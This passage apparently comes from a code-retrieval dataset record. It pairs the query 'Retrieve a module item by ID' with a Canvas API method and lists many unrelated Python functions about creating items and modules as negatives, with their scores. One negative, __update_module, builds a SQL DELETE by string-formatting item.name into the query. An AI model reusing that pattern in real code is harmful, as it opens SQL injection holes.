Token: {}'\n .format(' '.join(full_token)))\n\n # All done.", "def create():", "def create():", "def create(name):\n if not SchModule._ready:\n raise ValueError(\"not mounted\")\n\n schdir = SchModule.DIR.hpath(name)\n\n if path.exists(schdir):\n raise Exception(\"Already exists\")\n\n # create this scheme directory\n os.makedirs(schdir)\n\n with codecs.open(path.join(schdir, SchModule.DESCR), \"w\", \"utf8\") as f:\n timestamp = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n user = os.getenv(\"USER\", os.getenv(\"USERNAME\", \"Unknown\"))\n f.write(SchModule.DESCRTEMPLATE % locals())\n\n with codecs.open(path.join(schdir, SchModule.PYMODULE), \"w\", \"utf8\") as f:\n f.write(SchModule.PYMODULETEMPLATE)", "def create_module(module_dict: Dict[str, Any], nets: List[Net]) -> Module:\n m_data = module_dict['module']\n footprint = m_data[0].replace('\"', \"\")\n layer = convert_to_layers(get_dict_by_key(m_data, 'layer')['layer'])[0]\n coords = get_dict_by_key(m_data, 'at')['at']\n if len(coords) == 3 and \"B.\" in layer.name:\n coords[2] = (float(coords[2]) + 180) % 360\n coords[1] = str(-1*float(coords[1]))\n attr = get_dict_by_key(m_data, 'attr')\n smd: bool = True if (attr and attr['attr'] == 'smd') else False\n module_texts: List[FpText] = get_texts(m_data, 'fp_text')\n figures: List[Union[FpPoly, FpCircle, FpArc, FpLine]] = get_lines(m_data, 'fp_line')\n figures.extend(get_circles(m_data, 'fp_circle'))\n pads = get_pads(m_data, nets)\n ref = [text.text for text in module_texts if text.text_type ==TextType.reference][0]\n update_nets_with_pads(pads, nets, ref)\n figures.extend(get_polys(m_data, 'fp_poly'))\n figures.extend(get_arcs(m_data, 'fp_arc'))\n return Module(footprint=footprint, layer=layer, coords=coords, smd=smd,\n texts=module_texts, pads=pads, figures=figures, extrapads=list())", "def __load_item(item):\n\n itm = dtf.core.item.Item()\n\n itm.name = item.name\n itm.type = item.type\n\n itm.install_name = get_item_attrib(item, \"install_name\")\n itm.local_name = None\n itm.author = get_item_attrib(item, \"author\")\n itm.about = get_item_attrib(item, \"about\")\n itm.version = get_item_attrib(item, \"version\")\n\n return itm", "def _generate_item(ctx: Context, item_type, specification_path):\n # # check protocol buffer compiler is installed\n # res = shutil.which(\"protoc\")\n # if res is None:\n # print(\n # \"Please install protocol buffer first! See the following link: https://developers.google.com/protocol-buffers/\"\n # )\n # sys.exit(1)\n\n # Get existing items\n existing_id_list = getattr(ctx.agent_config, \"{}s\".format(item_type))\n existing_item_list = [public_id.name for public_id in existing_id_list]\n\n item_type_plural = item_type + \"s\"\n\n # Load item specification yaml file\n try:\n config_loader = ConfigLoader(\n \"protocol-specification_schema.json\", ProtocolSpecification\n )\n protocol_spec = config_loader.load_protocol_specification(\n open(specification_path)\n )\n except Exception as e:\n logger.exception(e)\n sys.exit(1)\n\n protocol_directory_path = os.path.join(\n ctx.cwd, item_type_plural, protocol_spec.name\n )\n\n # Check if we already have an item with the same name in the agent config\n logger.debug(\n \"{} already supported by the agent: {}\".format(\n item_type_plural, existing_item_list\n )\n )\n if protocol_spec.name in existing_item_list:\n logger.error(\n \"A {} with name '{}' already exists. 
Aborting...\".format(\n item_type, protocol_spec.name\n )\n )\n sys.exit(1)\n # Check if we already have a directory with the same name in the resource directory (e.g. protocols) of the agent's directory\n if os.path.exists(protocol_directory_path):\n logger.error(\n \"A directory with name '{}' already exists. Aborting...\".format(\n protocol_spec.name\n )\n )\n sys.exit(1)\n\n try:\n agent_name = ctx.agent_config.agent_name\n click.echo(\n \"Generating {} '{}' and adding it to the agent '{}'...\".format(\n item_type, protocol_spec.name, agent_name\n )\n )\n\n output_path = os.path.join(ctx.cwd, item_type_plural)\n protocol_generator = ProtocolGenerator(protocol_spec, output_path)\n protocol_generator.generate()\n\n # Add the item to the configurations\n logger.debug(\n \"Registering the {} into {}\".format(item_type, DEFAULT_AEA_CONFIG_FILE)\n )\n existing_id_list.add(PublicId(\"fetchai\", protocol_spec.name, DEFAULT_VERSION))\n ctx.agent_loader.dump(\n ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), \"w\")\n )\n except FileExistsError:\n logger.error(\n \"A {} with this name already exists. Please choose a different name and try again.\".format(\n item_type\n )\n )\n sys.exit(1)\n except Exception as e:\n logger.exception(e)\n shutil.rmtree(\n os.path.join(item_type_plural, protocol_spec.name), ignore_errors=True\n )\n sys.exit(1)", "def create(self):\n self.add_handlers({\"^T\": self.change_forms,\"^Q\": self.exit})\n self.add(npyscreen.TitleFixedText, name='Inventory items:', value='')\n self.inventory_mle = self.add(npyscreen.Pager,\n values=['Checking for plugins in the inventory, please wait...'])", "def create_and_add_item(self, word, samples):\n item = LibraryItem(word, samples)\n self.items.append(item)\n self.item_count += 1\n self.max_length = max(self.max_length, len(samples))", "def create_item_page():\n catagories = [c.name for c in Catagory.fetch_all()]\n return render_template('add_item.html', catagories=catagories, values={})", "def create_item():\n name = request.form['name']\n catagory = request.form['catagory']\n description = request.form['description']\n errors = form_errors(request.form)\n if errors:\n catagories = [c.name for c in Catagory.fetch_all()]\n values = {\n 'name': name, 'catagory': catagory, 'description': description\n }\n return render_template(\n 'add_item.html',\n catagories=catagories,\n values=values,\n errors=errors\n )\n Item.create(name, catagory_name=catagory, description=description)\n return redirect(url_for(\n 'read_item', catagory_name=catagory, item_name=name\n ))", "def add_new_item():\n\n lst = item_list()\n return render_template('index.html', sell_flag=1, items=lst)", "def add_item(self, item):\n if item.media_type == '':\n (has_guessed, media_type) = guess_type(item.get_name().lower())\n\n if has_guessed:\n if media_type is not None:\n item.media_type = media_type\n else:\n item.media_type = has_guessed\n else:\n item.media_type = 'application/octet-stream'\n\n if not item.get_id():\n # make chapter_, image_ and static_ configurable\n if isinstance(item, EpubHtml):\n item.id = 'chapter_%d' % self._id_html\n self._id_html += 1\n elif isinstance(item, EpubImage):\n item.id = 'image_%d' % self._id_image\n self._id_image += 1\n else:\n item.id = 'static_%d' % self._id_image\n self._id_image += 1\n\n item.book = self\n self.items.append(item)\n\n return item", "def _create_stack_item(container='gl-stack', children=None, viewers=None):\n children = [] if children is None else children\n viewers = [] if viewers is 
None else viewers\n\n return {\n 'id': str(uuid.uuid4()),\n 'container': container,\n 'children': children,\n 'viewers': viewers}", "def _save_item(request, usage_key, data=None, children=None, metadata=None, nullout=None,\r\n grader_type=None, publish=None):\r\n store = get_modulestore(usage_key)\r\n\r\n try:\r\n existing_item = store.get_item(usage_key)\r\n except ItemNotFoundError:\r\n if usage_key.category in CREATE_IF_NOT_FOUND:\r\n # New module at this location, for pages that are not pre-created.\r\n # Used for course info handouts.\r\n store.create_and_save_xmodule(usage_key)\r\n existing_item = store.get_item(usage_key)\r\n else:\r\n raise\r\n except InvalidLocationError:\r\n log.error(\"Can't find item by location.\")\r\n return JsonResponse({\"error\": \"Can't find item by location: \" + unicode(usage_key)}, 404)\r\n\r\n old_metadata = own_metadata(existing_item)\r\n\r\n if publish:\r\n if publish == 'make_private':\r\n _xmodule_recurse(\r\n existing_item,\r\n lambda i: modulestore().unpublish(i.location),\r\n ignore_exception=ItemNotFoundError\r\n )\r\n elif publish == 'create_draft':\r\n # This recursively clones the existing item location to a draft location (the draft is\r\n # implicit, because modulestore is a Draft modulestore)\r\n _xmodule_recurse(\r\n existing_item,\r\n lambda i: modulestore().convert_to_draft(i.location),\r\n ignore_exception=DuplicateItemError\r\n )\r\n\r\n if data:\r\n # TODO Allow any scope.content fields not just \"data\" (exactly like the get below this)\r\n existing_item.data = data\r\n else:\r\n data = existing_item.get_explicitly_set_fields_by_scope(Scope.content)\r\n\r\n if children is not None:\r\n children_usage_keys = [\r\n UsageKey.from_string(child)\r\n for child\r\n in children\r\n ]\r\n existing_item.children = children_usage_keys\r\n\r\n # also commit any metadata which might have been passed along\r\n if nullout is not None or metadata is not None:\r\n # the postback is not the complete metadata, as there's system metadata which is\r\n # not presented to the end-user for editing. So let's use the original (existing_item) and\r\n # 'apply' the submitted metadata, so we don't end up deleting system metadata.\r\n if nullout is not None:\r\n for metadata_key in nullout:\r\n setattr(existing_item, metadata_key, None)\r\n\r\n # update existing metadata with submitted metadata (which can be partial)\r\n # IMPORTANT NOTE: if the client passed 'null' (None) for a piece of metadata that means 'remove it'. 
If\r\n # the intent is to make it None, use the nullout field\r\n if metadata is not None:\r\n for metadata_key, value in metadata.items():\r\n field = existing_item.fields[metadata_key]\r\n\r\n if value is None:\r\n field.delete_from(existing_item)\r\n else:\r\n try:\r\n value = field.from_json(value)\r\n except ValueError:\r\n return JsonResponse({\"error\": \"Invalid data\"}, 400)\r\n field.write_to(existing_item, value)\r\n\r\n if existing_item.category == 'video':\r\n manage_video_subtitles_save(existing_item, request.user, old_metadata, generate_translation=True)\r\n\r\n # commit to datastore\r\n store.update_item(existing_item, request.user.id)\r\n\r\n result = {\r\n 'id': unicode(usage_key),\r\n 'data': data,\r\n 'metadata': own_metadata(existing_item)\r\n }\r\n\r\n if grader_type is not None:\r\n result.update(CourseGradingModel.update_section_grader_type(existing_item, grader_type, request.user))\r\n\r\n # Make public after updating the xblock, in case the caller asked\r\n # for both an update and a publish.\r\n if publish and publish == 'make_public':\r\n def _publish(block):\r\n # This is super gross, but prevents us from publishing something that\r\n # we shouldn't. Ideally, all modulestores would have a consistant\r\n # interface for publishing. However, as of now, only the DraftMongoModulestore\r\n # does, so we have to check for the attribute explicitly.\r\n store = get_modulestore(block.location)\r\n store.publish(block.location, request.user.id)\r\n\r\n _xmodule_recurse(\r\n existing_item,\r\n _publish\r\n )\r\n\r\n # Note that children aren't being returned until we have a use case.\r\n return JsonResponse(result)", "def _create_node(self, item: Item) -> Dict[str, Any]:\n node = {'text': item.title,\n 'item-id': item.id,\n 'nodes': []}\n icon = self.icon_name(item)\n if icon:\n node['icon'] = 'glyphicon glyphicon-{}'.format(icon)\n node['item_title'] = item.title\n node['item_type'] = item.type\n node['item_note'] = item.note\n node['node_type'] = item.__class__.__name__.lower()\n if isinstance(item, Item):\n meta = self._node_metadata(item)\n creators = item.creators\n if meta is not None:\n node['metadata'] = meta\n res = self._item_mapper.get_resource_name(item)\n if res is None:\n res = self._find_child_resource(item, self.PDF_EXT_REGEXP)\n if res is None:\n res = self._find_child_name(item, self.PDF_FULL_REGEXP)\n if res is not None:\n node['resource'] = res\n if creators is not None:\n if meta is None:\n meta = []\n node['metadata'] = meta\n meta.append(('Creators', ', '.join(map(str, creators))))\n if meta is not None:\n meta.sort()\n return node", "def create_menu_item(\n self,\n menu_name: str,\n item_name: str,\n callback: Callable | None = None,\n shortcut: str | None = None,\n ) -> None:\n self._widget._mgui_create_menu_item(menu_name, item_name, callback, shortcut)", "def _createModuleObj(self):\n ModuleInitialCondition.__init__(self)", "def addModulesToList(self):\n\n existing = self.getExistingModules()\n\n for module in self.modulesToAdd:\n if module not in existing:\n modName = cmds.getAttr(module + \".moduleName\")\n\n # add to listWIdget\n index = self.pickerUI.characterTabs.currentIndex()\n widget = self.pickerUI.characterTabs.widget(index)\n characterNode = widget.property(\"charNode\")\n\n item = QtWidgets.QListWidgetItem(modName)\n item.setData(QtCore.Qt.UserRole, [module, characterNode])\n self.moduleList.addItem(item)\n\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #", "def _createModuleObj(self):\n ModuleTimeWeakening.__init__(self)\n return", "def register(self, module):\n tagvalues = \"\\n\".join([\"%s: %s\" % (attr, str(getattr(module, attr))) for attr in dir(module) if attr in ['create', 'menu', 'name', 'label'] ])\n # tagvalues = \"\\n\".join([\"%s\" % (attr) for attr in dir(module) if attr not in ['urls'] ])\n logger.debug(\"module {} registered.\\ndir : {}\".format(module.label, tagvalues ))\n self._registry[module.label] = module\n self._modules[module.name] = module\n pass", "def new_module(reset_sys_argv, move_home_pypackage):\n\n TestModule.make_new()\n mod_path = TestModule.full_path()\n os.mkdir(mod_path)\n os.chdir(mod_path)\n return mod_path", "def insert_workflow_module(self, project_id, branch_id, before_module_id, command):\n with self.backend.lock:\n # Get the handle for the specified branch and the branch head\n branch = self.projects.get_branch(project_id=project_id, branch_id=branch_id)\n if branch is None:\n return None\n head = branch.get_head()\n if head is None or len(head.modules) == 0:\n return None\n\n # Get the index of the module at which the new module is inserted\n module_index = None\n modules = head.modules\n for i in range(len(modules)):\n if modules[i].identifier == before_module_id:\n module_index = i\n break\n if module_index is None:\n return None\n\n # Get handle for the inserted module\n context = compute_context(modules[0:module_index])\n # Create handle for the inserted module. 
The state of the module\n # depends on the state of the backend.\n if head.is_active:\n state = mstate.MODULE_PENDING\n else:\n state = self.backend.next_task_state()\n inserted_module = ModuleHandle(\n command=command,\n state=state,\n external_form=command.to_external_form(\n command=self.packages[command.package_id].get(command.command_id),\n datasets=[ context[name] for name in context if context[name].is_dataset ]\n ),\n provenance=ModuleProvenance(unexecuted=True)\n )\n # Create list of pending modules for the new workflow.\n pending_modules = [inserted_module]\n for m in modules[module_index:]:\n pending_modules.append(\n ModuleHandle(\n command=m.command,\n external_form=m.external_form,\n outputs=m.outputs,\n provenance=m.provenance\n )\n )\n workflow = branch.append_workflow(\n modules=modules[:module_index],\n action=wf.ACTION_INSERT,\n command=inserted_module.command,\n pending_modules=pending_modules\n )\n if not head.is_active:\n self.execute_module(\n project_id=project_id,\n branch_id=branch_id,\n module=workflow.modules[module_index],\n artifacts=context,\n )\n return workflow.modules[module_index:]", "def create(cls, payload: dict) -> 'Item':\n payload['slug'] = create_order_slug()\n return super().create(payload)", "def create_submodule(self, *args: Any, **kwargs: Any) -> Submodule:\n return Submodule.add(self, *args, **kwargs)", "def newItem():\n if request.method == 'POST':\n db.createItem(\n title=request.form['title'],\n description=request.form['description'],\n category_id=request.form['category'],\n user_id=login_session['user_id'])\n flash(\"New catalog item created!\", 'success')\n return redirect(url_for('showCatalog'))\n return render_template('new_item.html', categories=db.getAllCategories())", "def _createModuleObj(self):\n ModuleTimeHistory.__init__(self)", "def create():\n pass", "def create_item(_id, item_name, description):\n data_ = Data.get_the_data(_id, Data.bucketlists)\n for data in data_:\n bucketlist = Bucketlist(data['title'],\n data['owner'],\n data['intro'],\n data['owner_id'],\n data['_id'])\n bucketlist.new_item(item_name=item_name,\n description=description)", "def make_module(module_name, module_type, parameters):\n\n module = {module_name: {}}\n \n for parameter in parameters:\n required = input(\"Is \" + parameter + \" required (y/n)?\")\n \n if required == 'n':\n module[module_name][parameter] = None \n\n elif required == 'y':\n module[module_name][parameter] = 'r'\n \n with open('all_modules.yml', 'a') as file_object:\n yaml.dump(module, file_object, default_flow_style=False, sort_keys=False)", "def new(self, *args, **kw):\n id_tipo_item = UrlParser.parse_id(request.url, \"tipositems\")\n url_action = \"./\"\n\n pp = PoseePermiso('redefinir tipo item', id_tipo_item=id_tipo_item)\n if not pp.is_met(request.environ):\n flash(pp.message % pp.nombre_permiso, 'warning')\n redirect(atras)\n tmpl_context.widget = self.new_form\n return dict(value=kw, \n page=u\"Nuevo Atributo\", \n action=url_action, \n atras=url_action)", "def create_add_new_item(self, name, count=1):\r\n item = Item.create_by_name(name)\r\n stackable = item.get_stackable()\r\n if stackable:\r\n stackable.set_count(count)\r\n else:\r\n assert count == 1, 'cannot set count attributes on non-stackable item %s' % name\r\n return self.add_item(item)", "def create(self, mapItem: MapItem) -> int:\n pass", "def create_test_inventory(**kw):\n inventory = get_test_inventory(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del inventory['id']\n dbapi 
= db_api.get_instance()\n return dbapi.create_node_inventory(inventory)", "def create(index):\n # Get the project root\n project_root = get_project_root()\n package_name = os.path.basename(project_root)\n logging.info(\"Creating package for current project: \" + package_name)\n Packager(package_name, project_root).create(index)", "def __init_module(self, module_type: str) -> Module:\n\n module = {\n \"button\": Button,\n \"dial\": Dial,\n \"display\": Display,\n \"env\": Env,\n \"gyro\": Gyro,\n \"ir\": Ir,\n \"led\": Led,\n \"mic\": Mic,\n \"motor\": Motor,\n \"speaker\": Speaker,\n \"ultrasonic\": Ultrasonic,\n }.get(module_type)\n return module", "def make_module_instance(self, *args, **kwargs):\r\n\r\n # Function to go through member lists and dictionaries recursively,\r\n # to look for submodules on which make_module_instance needs to be called\r\n def recurse(v):\r\n if isinstance(v,list):\r\n iterv = enumerate(v)\r\n else:\r\n iterv = v.iteritems()\r\n #backport\r\n #iter = enumerate(v) if isinstance(v,list) else v.iteritems()\r\n for sk,sv in iterv:\r\n if isinstance(sv,(list,dict)):\r\n sv = recurse(sv)\r\n elif isinstance(sv,Module):\r\n sv = sv.make_module_instance(args,kwargs)\r\n v[sk] = sv\r\n return v\r\n\r\n for k,v in self.local_attr.iteritems():\r\n if isinstance(v,Module):\r\n v = v.make_module_instance(args,kwargs)\r\n self[k] = self.__wrapper__(v)\r\n elif isinstance(v,Method):\r\n self.__setitem__(k,v)\r\n else:\r\n # iterate through lists and dictionaries to wrap submodules\r\n if isinstance(v,(list,dict)):\r\n self[k] = self.__wrapper__(recurse(v))\r\n try:\r\n self[k] = self.__wrapper__(v)\r\n except Exception:\r\n if isinstance(v, Component):\r\n raise\r\n else:\r\n self.__dict__[k] = v\r\n return self", "def Create(self, finder):\n today = datetime.datetime.today()\n sourceTimestamp = 0\n for module in finder.modules:\n if module.file is None:\n continue\n if module.inZipFile:\n continue\n if not os.path.exists(module.file):\n raise ConfigError(\"no file named %s (for module %s)\",\n module.file, module.name)\n timestamp = os.stat(module.file).st_mtime\n sourceTimestamp = max(sourceTimestamp, timestamp)\n sourceTimestamp = datetime.datetime.fromtimestamp(sourceTimestamp)\n self.values[\"BUILD_TIMESTAMP\"] = today.strftime(self.timeFormat)\n self.values[\"BUILD_HOST\"] = socket.gethostname().split(\".\")[0]\n self.values[\"SOURCE_TIMESTAMP\"] = \\\n sourceTimestamp.strftime(self.timeFormat)\n module = finder._AddModule(self.moduleName)\n sourceParts = []\n names = list(self.values.keys())\n names.sort()\n for name in names:\n value = self.values[name]\n sourceParts.append(\"%s = %r\" % (name, value))\n source = \"\\n\".join(sourceParts)\n module.code = compile(source, \"%s.py\" % self.moduleName, \"exec\")\n return module", "def createItem(category_id):\r\n if 'username' not in login_session:\r\n return redirect(url_for('showLogin'))\r\n if request.method == 'POST':\r\n session = DBSession()\r\n item = Item(name=request.form['name'],\r\n description=request.form['description'],\r\n category_id=category_id,\r\n user_id=login_session['user_id'])\r\n session.add(item)\r\n session.commit()\r\n return redirect(url_for('showCategoryItems', category_id=category_id))\r\n else:\r\n return render_template('newitem.html', category_id=category_id)", "def create_modules(self):\n self.bitcell = self.replica_bitcell = self.mod_replica_bitcell()\n self.add_mod(self.bitcell)\n\n # This is the replica bitline load column that is the height of our array\n self.rbl = 
bitcell_array(name=\"bitline_load\", cols=1, rows=self.bitcell_loads)\n self.add_mod(self.rbl)\n\n # FIXME: The FO and depth of this should be tuned\n self.delay_chain = self.mod_delay_chain([self.delay_fanout]*self.delay_stages)\n self.add_mod(self.delay_chain)\n\n self.inv = pinv()\n self.add_mod(self.inv)\n\n self.access_tx = ptx(tx_type=\"pmos\")\n self.add_mod(self.access_tx)", "def item_create(\n item, item_id, item_type, create=\"create\", extra_args=None, cibfile=None\n):\n cmd = [\"pcs\"]\n if isinstance(cibfile, str):\n cmd += [\"-f\", cibfile]\n\n if isinstance(item, str):\n cmd += [item]\n elif isinstance(item, (list, tuple)):\n cmd += item\n\n # constraint command follows a different order\n if item in [\"constraint\"]:\n if isinstance(item_type, str):\n cmd += [item_type]\n\n if isinstance(create, str):\n cmd += [create]\n elif isinstance(create, (list, tuple)):\n cmd += create\n\n # constraint command needs item_id in format 'id=<id' after all params\n # constraint command follows a different order\n if item not in [\"constraint\"]:\n cmd += [item_id]\n if isinstance(item_type, str):\n cmd += [item_type]\n\n if isinstance(extra_args, (list, tuple)):\n # constraint command needs item_id in format 'id=<id' after all params\n if item in [\"constraint\"]:\n extra_args = extra_args + [\"id={}\".format(item_id)]\n cmd += extra_args\n\n return __salt__[\"cmd.run_all\"](cmd, output_loglevel=\"trace\", python_shell=False)", "def create_or_modify_module_db(request, module_db_id=None):\n success = False\n data_obj = {}\n errors = []\n try:\n if request.method == 'POST':\n json_obj = json.loads(request.body)\n list_name = json_obj.get('list_name', None)\n status = json_obj.get('status', None)\n origin = json_obj.get('origin', None)\n destination = json_obj.get('destination', None)\n if list_name:\n if module_db_id:\n list_db = ModuleContactListDB.objects.get(id=module_db_id)\n list_db.list_name = list_name\n list_db.status = status\n list_db.origin = origin\n list_db.destination = destination\n list_db.save()\n data_obj = list_db.as_dict\n else:\n current_user = Client.objects.get(user=request.user)\n list_db = ModuleContactListDB.objects.create(\n list_name=list_name,\n owner=current_user,\n origin=origin,\n destination=destination,\n status=status\n )\n data_obj = list_db.as_dict\n success = True\n except Exception as e:\n errors = e.args\n\n data = {'success': success, 'errors': errors, 'data': data_obj}\n return json_response(data)", "def create_sample_order_item(item, quantity, data_only):\n order_item_info = {\n 'item': item.pk,\n 'quantity': quantity\n }\n if data_only:\n return order_item_info\n\n else:\n order_item_obj = OrderItem.objects.create(\n item=item,\n quantity=quantity\n )\n order_item_info[\"id\"] = order_item_obj.id\n return order_item_obj, order_item_info", "def __update_module(item):\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM modules '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n\n entry = [(item.name, item.about, item.version,\n item.author, item.install_name)]\n\n # Update a Module Entry\n sql = ('INSERT INTO modules (name, about, version, '\n 'author, install_name)'\n 'VALUES (?, ?, ?, ?, ?)')\n\n cur.executemany(sql, entry)\n conn.commit()\n\n return cur.rowcount", "def get_module_item(self, module_item, **kwargs):\n module_item_id = obj_or_id(module_item, \"module_item\", (ModuleItem,))\n\n response = self._requester.request(\n \"GET\",\n \"courses/{}/modules/{}/items/{}\".format(\n 
self.course_id, self.id, module_item_id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def create_module_file(package, module, opts):\n text = format_heading(1, '%s Module' % module)\n #text += format_heading(2, ':mod:`%s` Module' % module)\n text += format_directive(module, package)\n write_file(makename(package, module), text, opts)", "def add_item(self, obj): # deprecated\n logger.info('ItemProduct adding item initiated')\n try:\n if not obj['edit']:\n unit, = self.ProductUom.find([('name', '=', obj['units'])])\n template = self.ProductTemplate()\n try:\n if self.Product.find([('code', '=', obj['id']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]:\n return False\n if self.Product.find([('name', '=', obj['name']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]:\n return False\n except Exception:\n pass\n template.category = self.ProductCategory.find([('name', '=', obj['category'])])[-1]\n template.default_uom = unit\n template.purchase_uom = unit\n template.type = 'goods'\n else:\n product = self.Product.find([('code', '=', obj['id']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]\n template = product.template\n unit, = self.ProductUom.find([('name', '=', obj['units'])])\n template.default_uom = unit\n template.purchase_uom = unit\n template.category = self.ProductCategory.find([('name', '=', obj['category'])])[-1]\n\n rate = Decimal(obj['rate'])\n cost = rate / 2\n template.name = obj['name']\n template.list_price = Decimal(rate)\n template.cost_price = Decimal(cost)\n template.purchasable = True\n template.account_expense = self.accounts['expense']\n template.account_receivable = self.accounts['receivable']\n product = self.Product.find([('name', '=', template.name),\n ('description', '=', 'Stock'), ('type', '=', 'goods')])\n if product:\n product = product[-1]\n else:\n product = self.Product.find([('name', '=', template.name), ('type', '=', 'goods')])\n ids = []\n for i in product:\n ids.append(i.id)\n ids.sort()\n print \"ids\", ids\n product = self.Product(id=ids[-1])\n product.code = obj['id']\n product.description = 'Stock'\n product.save()\n return True\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return False", "def create_menu_item(menu, label, func, id=None, help=\"\", kind=wx.ITEM_NORMAL, bind_to=None):\n if id is None:\n id = wx.ID_ANY\n item = wx.MenuItem(menu, id, label, help, kind)\n if bind_to == None: # bind to the menu by default\n menu.Bind(wx.EVT_MENU, func, id=item.GetId())\n else:\n bind_to.Bind(wx.EVT_MENU, func, id=item.GetId())\n menu.Append(item)\n return item", "def create(self, *args, **kwargs):\n pass", "def create_and_save_xmodule(self, location, definition_data=None, metadata=None, system=None,\r\n fields={}):\r\n # differs from split mongo in that I believe most of this logic should be above the persistence\r\n # layer but added it here to enable quick conversion. I'll need to reconcile these.\r\n new_object = self.create_xmodule(location, definition_data, metadata, system, fields)\r\n location = new_object.scope_ids.usage_id\r\n self.update_item(new_object, allow_not_found=True)\r\n\r\n # VS[compat] cdodge: This is a hack because static_tabs also have references from the course module, so\r\n # if we add one then we need to also add it to the policy information (i.e. 
metadata)\r\n # we should remove this once we can break this reference from the course to static tabs\r\n # TODO move this special casing to app tier (similar to attaching new element to parent)\r\n if location.category == 'static_tab':\r\n course = self._get_course_for_item(location)\r\n course.tabs.append(\r\n StaticTab(\r\n name=new_object.display_name,\r\n url_slug=new_object.scope_ids.usage_id.name,\r\n )\r\n )\r\n self.update_item(course)\r\n\r\n return new_object" ]
[ "0.7228198", "0.65279996", "0.63207406", "0.63207406", "0.6307136", "0.6218153", "0.6193564", "0.61688536", "0.6122195", "0.61181813", "0.60919625", "0.6052571", "0.6050587", "0.6030838", "0.6015427", "0.6014498", "0.6013799", "0.59456086", "0.5937084", "0.5928567", "0.5924971", "0.5920281", "0.5902033", "0.5873777", "0.5870397", "0.5856607", "0.58520806", "0.5821009", "0.57937807", "0.57715744", "0.57451516", "0.5713115", "0.5697279", "0.56801933", "0.56798196", "0.56586707", "0.56530035", "0.56483036", "0.5646686", "0.5640723", "0.5632459", "0.56240445", "0.5622746", "0.5619304", "0.5615338", "0.55965734", "0.55920595", "0.55842984", "0.5582712", "0.55771655", "0.5565845", "0.5564834", "0.5564834", "0.555787", "0.5556857", "0.55515146", "0.55433285", "0.552949", "0.5527896", "0.5525723", "0.5522393", "0.5504653", "0.5504236", "0.5487189", "0.54849046", "0.5484351", "0.54688466", "0.546695", "0.54636025", "0.54617894", "0.54461193", "0.5441786", "0.5439867", "0.54396576", "0.5436644", "0.5435951", "0.54341394", "0.54305696", "0.5427376", "0.54160255", "0.54118794", "0.5407032", "0.5406789", "0.5404673", "0.540423", "0.5396508", "0.5393766", "0.5390252", "0.5386987", "0.53839517", "0.5379776", "0.5375489", "0.53724873", "0.53704315", "0.5365443", "0.53622794", "0.53545976", "0.53506595", "0.53495854", "0.53484637" ]
0.7833921
0
Retrieve a module item by ID.
def get_module_item(self, module_item, **kwargs): module_item_id = obj_or_id(module_item, "module_item", (ModuleItem,)) response = self._requester.request( "GET", "courses/{}/modules/{}/items/{}".format( self.course_id, self.id, module_item_id ), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getItem(self, id):\n path = 'item/' + id\n return self.sendRestRequest('GET', path)", "def getitem(itemID):\n\n return harvest(GET_ITEM_URL, itemID)", "def get_item_from_modulestore(usage_key, draft=False):\r\n store = modulestore('draft') if draft else modulestore('direct')\r\n return store.get_item(usage_key)", "def get_item_by_id(self, item_id):\n\n return self.api.items.get(item_id)['item']", "def get_item(item_id):\n return Item.query.filter_by(id=item_id).first()", "def read_item(id: str, request: Request):\n obj = db.get(id, kind=endpoint_model)\n return obj", "def get_item(self, item_id): # pragma: no cover\n raise NotImplementedError", "def get_item(self, item_id):\n if self._database:\n try:\n return self._database.retrieve(item_id)\n except PyragargaError:\n pass\n # TODO: Retry if it times out \n details_page = self._build_tree(\n self._session.get(KG_URL + DETAILS_SCRIPT,\n params={'id': item_id, 'filelist':1}\n ).content)\n item = self._parse_details_page(details_page, item_id)\n if self._database:\n self._database.store(item)\n self.logger.info('Received details for item %d' % item.kg_id)\n return item", "def read_item(id):\n\n username = login_session.get('username', None)\n item = session.query(Item).filter_by(id=id).one()\n item_display = {'id': item.id, 'title': item.title, 'desc': item.desc}\n return render_template(\n 'read_item.html',\n item_display=item_display,\n username=username)", "def get_item_by_id(self, id):\n results = self.table_connector.query(\n KeyConditionExpression=Key(self.primary_key).eq(id)\n )\n return results[\"Items\"][0] if \"Items\" in results else []", "def fetch_module_object(itemID):\r\n try:\r\n item = GameItemLink.objects.get(gameItemLinkID=itemID)\r\n except GameItemLink.DoesNotExist:\r\n return False, None, None\r\n\r\n return True, item.module_item_content(), item", "def itemById(self, itemId):\n itemType = \"\".join([i for i in itemId if not i.isdigit()])\n if itemType not in self.__inventory__:\n return None\n for item in self.__inventory__[itemType]:\n if item.id == itemId:\n return item\n return None", "def get_item(self, item_id):\n for item in self.order_items:\n if item.get_itemId() == item_id:\n return item", "def get_item(self, usage_key, depth=0):\r\n item = self._find_one(usage_key)\r\n module = self._load_items(usage_key.course_key, [item], depth)[0]\r\n return module", "def lookup_module(id):\n return _registry[id]", "def show_item_by_id(plugin, item_id):\n import alltheitems.item_page\n return alltheitems.item_page.item_page(plugin + ':' + item_id)", "def getItem(self, itemID, no_html=False):\n data = self._client.Item.find(int(itemID))\n item = self.makeDict(data, 